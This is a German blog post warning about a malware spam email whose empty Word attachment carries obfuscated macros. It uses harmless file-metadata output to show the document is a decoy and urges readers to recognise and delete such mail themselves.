Und um an den nicht benannten Betrag Geldes zu kommen, den mir ein paar völlig Unbekannte aus völlig unbekannten Gründen geben wollen, muss ich „nur“ einen Mailanhang von ein paar völlig Unbekannten aufmachen. Dieser Anhang ist ein Dokument für Microsoft Word…

$ file Outsanding\ Statement\ 7363.doc | sed 's/, /\n/g'
Outsanding Statement 7363.doc: Composite Document File V2 Document
Little Endian
Os: Windows
Version 6.1
Code page: 1252
Author: BOBYCHENKO
Template: Normal.dotm
Last Saved By: BOBYCHENKO
Revision Number: 1
Name of Creating Application: Microsoft Office Word
Create Time/Date: Mon May 30 18:26:00 2016
Last Saved Time/Date: Mon May 30 18:26:00 2016
Number of Pages: 1
Number of Words: 0
Number of Characters: 0
Security: 0
$ _

…das auf einer Seite null Wörter mit insgesamt null Buchstaben enthält (und schon vor ein paar Tagen gepackt wurde, um erst jetzt auf die Postfächer losgelassen zu werden). Es ist also keineswegs das, was der Absender vorgibt, was es ist. Dafür sind ein paar „lustige“ Makros drin, die beim Öffnen des scheinbar leeren Dokumentes ausgeführt werden.

Wie üblich handelt es sich dabei um die neueste „Brut“ der Kriminellen. Zurzeit wird die völlig sichere Schadsoftware von keinem einzigen Antivirus-Schlangenöl als Schadsoftware erkannt. Deshalb ist es so wichtig, dass jeder Mensch derartige Spam selbst als Spam erkennt und unbeklickt in die Mülltonne schiebt. Es gibt einfach kein besseres Antivirus-Programm als das Gehirn.

Wer sich hingegen auf Programme verlässt, die sich immer wieder als wirkungslos erweisen, darf sich nicht wundern, wenn er demnächst bang ein paar Banknoten der Europäischen Zentralbank gegen Bitcoin tauscht und hofft, dass er wirklich wieder an seine Daten kommt – wie es der kriminelle Erpresser versprochen hat. Vielleicht gibt aber auch mal wieder nur manipuliertes Online-Banking und Mitgliedschaft in einem Botnetz, über das Spam, Software-Kopien, Schadsoftware und illegale Pornografie verteilt werden… der (vorsätzlich schwer lesbare) Makrocode scheint ein Nachlader zu sein, der Dateien aus dem Internet abholt und installiert.

I await your soonest response and confirmation

Best Regards,

Iceland Pelagic

Ja, du mich auch!

Close

⚠️ Kein Adblocker erkannt 🛑

Bitte installieren Sie so schnell wie möglich einen Adblocker für ihren Webbrowser! Sie schützen damit die Ihren Computer vor Schadsoftware, die über Malvertising verteilt wird, und Sie schützen sich selbst vor Ausspähung und intransparentem Datenhandel durch halbseiden bis grenzkriminell vorgehende Wirtschaftsunternehmen. Das ist Grund genug, einen Adblocker zu verwenden. Aber gleichzeitig machen Sie auch Ihre gesamte Interneterfahrung schöner, erfreulicher und schneller. Ich empfehle uBlock Origin.